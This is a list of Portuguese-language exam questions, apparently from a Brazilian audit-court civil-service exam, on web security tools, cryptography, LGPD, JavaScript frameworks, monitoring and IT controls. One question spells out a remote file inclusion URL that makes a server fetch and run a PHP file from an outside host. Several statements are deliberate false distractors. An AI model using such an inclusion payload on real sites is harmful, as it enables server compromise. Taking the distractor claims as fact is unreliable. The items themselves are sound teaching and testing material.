Foram encontradas 544 questões.
O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.
Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.
I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.
II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.
III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.
Está correto o que se afirma em
Provas
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Provas
Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Provas
A Lei Geral de Proteção de Dados (LGPD) estabelece uma série de princípios a ser observados durante o desenvolvimento de sistemas que tratam dados pessoais. Esses princípios têm como objetivo garantir a proteção e a privacidade dos dados, assim como a transparência no seu tratamento.
Nesse sentido, de acordo com os princípios da LGPD aplicados ao desenvolvimento de sistemas, é correto afirmar que
Provas
Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Provas
No ecossistema JavaScript existe uma ferramenta que atua como um compilador, permitindo utilizar funcionalidades recentes da linguagem (ex: async/await, classes, arrow functions e JSX), convertendo código ECMAScript 2015+ em uma versão compatível com navegadores mais antigos.
Tal ferramenta é denominada
Provas
Angular, React e Vue.js são poderosas ferramentas para o desenvolvimento de interfaces de usuários Single Page Applications e sistemas robustos. Elas apresentam, porém, diferentes abordagens.
Diante desse cenário, avalie as afirmativas a seguir e assinale (V) para a verdadeira e (F) para a falsa.
( ) Nuxt é um dos principais frameworks baseados em Angular.
( ) Uma característica do React é o emprego de JSX - extensão de sintaxe que permite escrever marcações semelhantes à HTML em um arquivo JavaScript.
( ) Mantido pelo Google, o Vue.js é baseado em TypeScript e no padrão MVC.
As afirmativas são, respectivamente,
Provas
O Zabbix é uma solução open source de monitoramento distribuído. É um software que monitora vários parâmetros de dispositivos de rede e a saúde e integridade de servidores, sistemas e aplicações. A arquitetura Zabbix possui diversos componentes, cada um com uma função específica.
O componente responsável por fazer a coleta de dados sobre disponibilidade e integridade de sistemas de TI em clientes em uma rede remota é o
Provas
No contexto de auditoria e compliance, a pilha ELK Stack (Elasticsearch, Logstash e Kibana) é amplamente usada para analisar e monitorar atividades nos sistemas, especialmente no que se refere à integridade e à segurança de dados.
Sobre as funcionalidades dessa pilha, assinale a afirmativa correta.
Provas
No contexto de Sistemas de Controle Interno em Sistemas de Informação, é fundamental alinhar a implementação de controles automatizados (logs de auditoria, permissões, autenticação entre outros) às normas reconhecidas, como COSO (Committee of Sponsoring Organizations of the Treadway Commission) e COBIT (Control Objectives for Information and Related Technologies), para garantir a eficácia e a conformidade das operações.
Assinale a afirmativa correta acerca da aplicação desses controles segundo as normas mencionadas.
Provas
Caderno Container